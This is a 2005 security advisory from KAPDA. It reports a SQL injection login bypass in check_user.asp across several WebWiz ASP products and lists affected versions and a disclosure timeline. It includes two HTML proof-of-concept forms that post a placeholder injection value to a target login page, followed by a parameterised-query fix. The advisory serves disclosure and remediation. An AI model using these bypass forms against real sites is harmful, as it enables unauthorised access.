[KAPDA::#18] - WebWiz Products SQL Injection
Happy new year ! :)
KAPDA New advisory
Vulnerable products :
webwiz site news access2000 : version 3.06 and prior versions
webwiz journal access2000 : version 1.0
webwiz weekly poll access2000 : version 3.06 and prior versions
database login access2000 : version 1.71 and prior versions
webwiz site news access97 : version 3.06 and prior versions
webwiz journal access97 : version 1.0
webwiz weekly poll access97 : version 3.06 and prior versions
database login access97 : version 1.71 and prior versions
Vendor: http://www.webwizguide.info
Risk: High
Vulnerability: SQL_Injection
Date :
--------------------
Found : Aug 14 2005
Vendor Contacted : Dec 30 2005
Release Date : Dec 30 2005
About WebWiz Products :
--------------------
Vendor's description:
WebWiz site news : http://webwizguide.info/asp/sample_scripts/site_news_script.asp
WebWiz journal : http://webwizguide.info/asp/sample_scripts/journal_application.asp
WebWiz weekly poll : http://webwizguide.info/asp/sample_scripts/weekly_poll_script.asp
WebWiz Password Login Page (Database Login) : http://webwizguide.info/asp/sample_scripts/database_login_script.asp
Discussion :
----------------
Some input passed to "check_user.asp" when logging in isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Vulnerabilities:
--------------------
SQL injection in "/[product]/check_user.asp".
In the 'txtUserName' parameter, an attacker can enter SQL commands to log in to the system (applies to all products).
Proof of Concepts:
--------------------
<html>
<h1>WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda's advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers Institute of Iran</a></p>
<form method="POST" action="http://target/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>
<html>
<h1>WebWiz Login Bypass PoC - Database login - Kapda's advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers Institute of Iran</a></p>
<form method="POST" action="http://target/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>
Solution:
--------------------
No patch has been released by the vendor yet.
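Until a vendor fix is available, a login check of this kind can be rewritten so that 'txtUserName' and 'txtUserPass' are bound as query parameters instead of being concatenated into the SQL string. The following is an added example, not code from the WebWiz products or from this advisory; the database path, table and column names, session variable and redirect targets are assumptions.

```asp
<%@ Language="VBScript" %>
<%
Option Explicit
' Added example: hardened login check for a check_user.asp-style page.
' Assumed (not taken from the WebWiz source): database path, table tblUsers,
' columns UserName / UserPass, session variable and both redirect targets.

Const adCmdText = 1        ' ADO CommandTypeEnum: plain SQL text
Const adParamInput = 1     ' ADO ParameterDirectionEnum: input parameter
Const adVarWChar = 202     ' ADO DataTypeEnum: Unicode text
Const MAX_LEN = 50         ' assumed width of both columns

Dim strUser, strPass, conn, cmd, rs, blnOK
strUser = Trim(Request.Form("txtUserName"))
strPass = Request.Form("txtUserPass")
blnOK = False

' Reject empty or oversized input before touching the database.
If Len(strUser) > 0 And Len(strUser) <= MAX_LEN And _
   Len(strPass) > 0 And Len(strPass) <= MAX_LEN Then
    Set conn = Server.CreateObject("ADODB.Connection")
    conn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath("db/users.mdb")

    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    ' Positional placeholders: form values are sent as data and never
    ' become part of the SQL text, so quotes in them have no SQL meaning.
    cmd.CommandText = "SELECT UserName FROM tblUsers WHERE UserName = ? AND UserPass = ?"
    cmd.Parameters.Append cmd.CreateParameter("@user", adVarWChar, adParamInput, MAX_LEN, strUser)
    cmd.Parameters.Append cmd.CreateParameter("@pass", adVarWChar, adParamInput, MAX_LEN, strPass)

    Set rs = cmd.Execute
    If Not rs.EOF Then blnOK = True
    rs.Close : Set rs = Nothing
    Set cmd = Nothing
    conn.Close : Set conn = Nothing
End If

' Session flag name and target pages are hypothetical.
Session("blnIsUserGood") = blnOK
If blnOK Then
    Response.Redirect "authorised_user_page.asp"
Else
    Response.Redirect "unauthorised_user_page.htm"
End If
%>
```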
Original Advisory:
--------------------
http://www.kapda.ir/advisory-167.html
Credit :
--------------------
DevilBox of KAPDA
devil_box [at} kapda.ir
Kapda - Security Science Researchers Institute of Iran
http://www.KAPDA.ir